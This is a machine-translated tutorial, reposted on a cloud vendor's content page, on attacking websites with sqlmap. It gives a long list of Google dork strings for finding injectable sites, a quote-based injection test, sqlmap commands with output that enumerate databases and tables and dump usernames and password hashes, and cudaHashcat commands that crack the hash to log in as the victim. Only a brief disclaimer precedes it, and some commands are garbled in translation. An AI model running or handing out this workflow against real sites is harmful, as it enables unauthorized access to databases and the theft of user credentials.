SQL injection attacks on websites and databases using Sqlmap

Source: Internet
Author: User
Tags decrypt microsoft sql server sql error stack trace kali linux

from:http://www.blackmoreops.com/2014/05/07/use-sqlmap-sql-injection-hack-website-database/

0x00 Background Introduction 1. What is SQL injection?

SQL injection is a code injection technique that used to attack data-driven applications such as injecting malicious SQL code into specific fields for the implementation of a drag-and-drop attack. The success of SQL injection must be the result of an application's security vulnerability, such as when user input is not properly filtered (for certain strings), or when there is no special emphasis on the type, it can easily cause the SQL statement to execute abnormally. SQL injection is the most common attack technique in website infiltration, but SQL injection can be used to attack all SQL databases. In this guide I will show you how to use Sqlmap to penetrate a website (more precisely the database) on Kali Linux and extract the user name and password information.

2. What is Sqlmap?

Sqlmap is an open-source penetration testing tool that is primarily used to automate the detection and implementation of SQL injection attacks and infiltrate database servers. The Sqlmap is equipped with a powerful detection engine for advanced penetration test users, not only to obtain fingerprint information from different databases, but also to extract data from the database, as well as to handle potential file systems and execute system commands through out-of-band data connections.

Visit the official website of Sqlmap http://www.sqlmap.org can get sqlmap more detailed introduction, such as its many features, the most prominent is sqlmap perfect support MySQL, Oracle, PostgreSQL, SQL detection and injection of various databases such as ms-sql and access, while six injection attacks are possible.

It's also important to note that before you attack, think about the site's creators or maintainers who spend a lot of time and effort on the site and are likely to survive. Your behavior may affect others in a way that you never want. I think I have made it clear enough. (PS: Please carefully attack, do not do illegal things)

PS: Before Wooyun read some articles about Sqlmap, benefited, today translated this article, is to use SQLMAP to provide a basic framework, the principle of SQL injection and sqlmap detailed command parameters and different application examples can refer to the following article:

SQL injection principle: HTTP://DROPS.WOOYUN.ORG/PAPERS/59

Sqlmap User manual: http://drops.wooyun.org/tips/143

Sqlmap instance cookbook:http://drops.wooyun.org/tips/1343

0x01 Location-Injected site

This is usually the most tedious and time-consuming step, and if you already know how to use Google dorks (Google dorks sql insection: Google fool-type SQL injection) you may have some clue, but if you haven't collated those strings for Google search , you can consider copying the following entry to wait for Google's search results.

A: Use Google Dorks string to find a website that can be injected

This list is very long, if you also know SQL, then you can also add new entries, remember to leave a message to me.

Google dork string Column 1 Google dork string Column 2 Google dork string Column 3
Inurl:item_id= Inurl:review.php?id= Inurl:hosting_info.php?id=
Inurl:newsid= inurl:iniziativa.php?in= Inurl:gallery.php?id=
Inurl:trainers.php?id= Inurl:curriculum.php?id= Inurl:rub.php?idr=
Inurl:news-full.php?id= Inurl:labels.php?id= Inurl:view_faq.php?id=
Inurl:news_display.php?getid= Inurl:story.php?id= Inurl:artikelinfo.php?id=
inurl:index2.php?option= Inurl:look.php?id= Inurl:detail.php?id=
Inurl:readnews.php?id= Inurl:newsone.php?id= inurl:index.php?=
inurl:top10.php?cat= Inurl:aboutbook.php?id= Inurl:profile_view.php?id=
Inurl:newsone.php?id= Inurl:material.php?id= Inurl:category.php?id=
Inurl:event.php?id= Inurl:opinions.php?id= Inurl:publications.php?id=
Inurl:product-item.php?id= Inurl:announce.php?id= Inurl:fellows.php?id=
Inurl:sql.php?id= Inurl:rub.php?idr= Inurl:downloads_info.php?id=
Inurl:index.php?catid= Inurl:galeri_info.php?l= Inurl:prod_info.php?id=
Inurl:news.php?catid= inurl:tekst.php?idt= Inurl:shop.php?do=part&id=
Inurl:index.php?id= Inurl:newscat.php?id= Inurl:productinfo.php?id=
Inurl:news.php?id= inurl:newsticker_info.php?idn= Inurl:collectionitem.php?id=
Inurl:index.php?id= Inurl:rubrika.php?idr= Inurl:band_info.php?id=
Inurl:trainers.php?id= Inurl:rubp.php?idr= Inurl:product.php?id=
inurl:buy.php?category= inurl:offer.php?idf= Inurl:releases.php?id=
Inurl:article.php?id= inurl:art.php?idm= Inurl:ray.php?id=
Inurl:play_old.php?id= Inurl:title.php?id= Inurl:produit.php?id=
Inurl:declaration_more.php?decl_id= Inurl:news_view.php?id= Inurl:pop.php?id=
Inurl:pageid= Inurl:select_biblio.php?id= Inurl:shopping.php?id=
Inurl:games.php?id= Inurl:humor.php?id= Inurl:productdetail.php?id=
inurl:page.php?file= Inurl:aboutbook.php?id= Inurl:post.php?id=
Inurl:newsdetail.php?id= Inurl:ogl_inet.php?ogl_id= Inurl:viewshowdetail.php?id=
Inurl:gallery.php?id= Inurl:fiche_spectacle.php?id= Inurl:clubpage.php?id=
Inurl:article.php?id= Inurl:communique_detail.php?id= Inurl:memberinfo.php?id=
Inurl:show.php?id= Inurl:sem.php3?id= Inurl:section.php?id=
Inurl:staff_id= Inurl:kategorie.php4?id= Inurl:theme.php?id=
inurl:newsitem.php?num= Inurl:news.php?id= Inurl:page.php?id=
Inurl:readnews.php?id= Inurl:index.php?id= Inurl:shredder-categories.php?id=
inurl:top10.php?cat= Inurl:faq2.php?id= Inurl:tradecategory.php?id=
inurl:historialeer.php?num= Inurl:show_an.php?id= Inurl:product_ranges_view.php?id=
inurl:reagir.php?num= Inurl:preview.php?id= Inurl:shop_category.php?id=
inurl:stray-questions-view.php?num= Inurl:loadpsb.php?id= Inurl:transcript.php?id=
inurl:forum_bds.php?num= Inurl:opinions.php?id= Inurl:channel_id=
Inurl:game.php?id= Inurl:spr.php?id= Inurl:aboutbook.php?id=
Inurl:view_product.php?id= Inurl:pages.php?id= Inurl:preview.php?id=
Inurl:newsone.php?id= Inurl:announce.php?id= Inurl:loadpsb.php?id=
Inurl:sw_comment.php?id= Inurl:clanek.php4?id= Inurl:pages.php?id=
Inurl:news.php?id= Inurl:participant.php?id=
Inurl:avd_start.php?avd= Inurl:download.php?id=
Inurl:event.php?id= Inurl:main.php?id=
Inurl:product-item.php?id= Inurl:review.php?id=
Inurl:sql.php?id= Inurl:chappies.php?id=
Inurl:material.php?id= Inurl:read.php?id=
Inurl:clanek.php4?id= Inurl:prod_detail.php?id=
Inurl:announce.php?id= Inurl:viewphoto.php?id=
Inurl:chappies.php?id= Inurl:article.php?id=
Inurl:read.php?id= Inurl:person.php?id=
Inurl:viewapp.php?id= Inurl:productinfo.php?id=
Inurl:viewphoto.php?id= Inurl:showimg.php?id=
Inurl:rub.php?idr= Inurl:view.php?id=
Inurl:galeri_info.php?l= Inurl:website.php?id=
B: Initial verification of whether the Web site can be SQL injected

After searching for the string above, you may get hundreds or thousands of results, so how can you tell if these sites are sqlmap injected? There are a number of ways, I'm sure you will argue which is the best, but for me the following is the simplest and most effective.

Let's say you used the string: inurl:item_id=, and then one of the results of the site is:

Http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

After adding a single quotation mark to the back, the URL becomes:

Http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 '

If the page returns a SQL error, there is a SQL injection point on the page, and if the page loads properly or redirects to a different page, skip the site and test the next site in the same way!

PS: Now more than more can use ' and 1=1 ', ' or 1=1 ' and other test injection points, this article is focused on the use of sqlmap injection of ideas and overall steps "

Here is my own SQL error when testing:

The SQL errors returned by different databases may be different, such as:

Microsoft SQL Server

Server Error in '/' Application. Unclosed quotation mark before the character string ' attack; '.

Description: Description:an unhanded exception occurred during the execution of the current Web request. Review the stack trace for more information about the error where it originated in the code.

Exception Details:System.Data.SqlClient.SqlException:Unclosed quotation mark before the character string ' attack; '

MySQL Errors

Warning:mysql_fetch_array (): supplied argument is not a valid MySQL result resource In/var/www/myawesomestore.com/buystu Ff.php on line 12error:you has an error in your SQL syntax:check the manual, corresponds to your MySQL server Versi On-The right syntax-use-near "at line 12

Oracle Errors

Java.sql.sqlexception:ora-00933:sql command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException ( dberror.java:180) at Oracle.jdbc.ttc7.TTIoer.processError (ttioer.java:208) Error: Sqlexceptionjava.sql.sqlexception:ora-01756:quoted string not properly terminated

PostgreSQL Errors

Query failed:ERROR:unterminated quoted string at or near "" "
0x02 List DBMS databases

As you can see, I found a Web site with a SQL injection point. Now I need to list all the databases (sometimes this is also known as the number of enumerated columns). Because I have been using sqlmap, it will tell me which loopholes exist.

Run the following command, which is the URL where you found the injection point:

Sqlmap-u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15--

We now see two databases, where INFORMATION_SCHEMA is the default standard database for almost all MySQL databases, so our interest is primarily on the Sqldummywebsite database.

Here are the parameters:

Sqlmap:sqlmap the name of the executable file, or you can use the Python sqlmap.py instead of-u: Target Url--dbs: Enumerate the DBMS database
0X03 lists the tables for the target database

Now we need to know which tables are in the database Sqldummywebsite, in order to get this information, we use the following command:

Sqlmap-u Http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15-D Sqldummywebsite--tables

We found this data to have 8 sheets:

[10:56:20] [info] fetching tables for database: ' Sqldummywebsite ' [10:56:22] [INFO] Heuristics Detected Web page charset ' I So-8859-2 ' [10:56:22] [INFO] The SQL query used returns 8 entries[10:56:25] [info] retrieved:item[10:56:27] [INFO] Retriev ED:LINK[10:56:30] [INFO] retrieved:other[10:56:32] [info] retrieved:picture[10:56:34] [INFO] retrieved:picture_tag[ 10:56:37] [INFO] retrieved:popular_picture[10:56:39] [info] retrieved:popular_tag[10:56:42] [INFO] Retrieved:user_ Info

Obviously, our interest is mainly in table User_info, because this table contains the user name and password of the database.

0X04 lists the columns in the specified database

Now we need to list all the columns in the table User_info of the database Sqldummywebsite, and using Sqlmap to do this is very simple, run the following command:

Sqlmap-u Http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15-D sqldummywebsite-t user_info--columns

A command returns 5 segments:

[10:57:16] [info] fetching columns for table ' user_info ' in database ' Sqldummywebsite ' [10:57:18] [info] heuristics Detecte D Web page charset ' iso-8859-2 ' [10:57:18] [INFO] The SQL query used returns 5 ENTRIES[10:57:20] [INFO] retrieved:user_id[ 10:57:22] [info] Retrieved:int (TEN) unsigned[10:57:25] [info] retrieved:user_login[10:57:27] [info] Retrieved:varchar ( [10:57:32] [info] retrieved:user_password[10:57:34] [info] Retrieved:varchar (255) [10:57:37] [INFO] Retrieved: UNIQUE_ID[10:57:39] [INFO] Retrieved:varchar (255) [10:57:41] [info] retrieved:record_status[10:57:43] [INFO] Retrieved:tinyint (4)

Ha ha! And the user_login user_password fields are the one we're looking for!

0x05 list user names from tables in the specified database

SQLMAP's SQL injection is very simple! Run the following command again:

Sqlmap-u Http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15-D sqldummywebsite-t user_info-c user_login-- Dump

Now we have the user name of the database:

[10:58:39] [info] retrieved:userx[10:58:40] [INFO] Analyzing table dump for possible password hashes

Now we only need the user's password, the following is to explain how to get the password!

0x06 Extract User Password

You may already be accustomed to using Sqlmap! Use the following parameters to extract the value of the password field!

Sqlmap-u Http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15-D sqldummywebsite-t user_info-c User_password- -dump

Now we get the password field:

[10:59:15] [INFO] The SQL query used returns 1 entries[10:59:17] [info] retrieved:24iybc17xk0e. [10:59:18] [INFO] Analyzing table dump for possible password hashesdatabase:sqldummywebsitetable:user_info[1 entry]+--- ------------+| User_password |+---------------+| 24iybc17xk0e. |+---------------+

Although we get the value of the password field, but it is the hash value of the password, now we need to decrypt the password. I've previously explored how to decrypt MD5, PhpBB, MySQL, and SHA-1 on Kali Linux.

You can refer to:

http://www.blackmoreops.com/2014/03/26/cracking-md5-phpbb-mysql-and-sha1-passwords-with-hashcat/

Here's a brief description of how to use Hashcat to crack MD5.

0x07 hack Password

Now that the value of the password field is 24iybc17xk0e, you should first determine the type of hash.

A: Identify the hash type

Fortunately, Kali Linux provides tools that can be used to identify hash types, requiring only command-line typing commands:

Hash-identifier

Then provide the hash value according to the prompt:

So this is a des (Unix) HASH.

PS: The actual hash encryption using several forms, such as *nix system, MD5 (Unix), and so on, the details can refer to the hash encryption type Portal: http://zone.wooyun.org/content/2471 "

B: Use Cudahashcat to crack hash

First we must know the code used by the DES Hash, run the command:

Cudahashcat--help | grep DES

PS: Here Cudahashcat is the use of the GPU to crack the tool, the following mentioned Oclhashcat is the same tool, detailed introduction and usage can refer to the Hashcat Introduction Portal: http://drops.wooyun.org/tools/655 "

: The code is either 1500 or 3100 because the target is a MySQL database, So it must be 1500. I'm running a computer with a Nvdia graphics card, so I can use cudahashcat, and my laptop is AMD graphics, then I can only use Oclhashcat hack MD5. If you run on VirtualBox or VMware, you can neither use Cudaha Shcat also cannot use Oclhashcat, you must install Kali Linux.

I store the hash value in the Des.hash file, and then run the command:

Cudahashcat-m 1500-a 0/root/sql/des.hash/root/sql/rockyou.txt

Now we have the password to hack: abc123, then we can use this user's identity login.

SQL injection attacks on websites and databases using Sqlmap

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.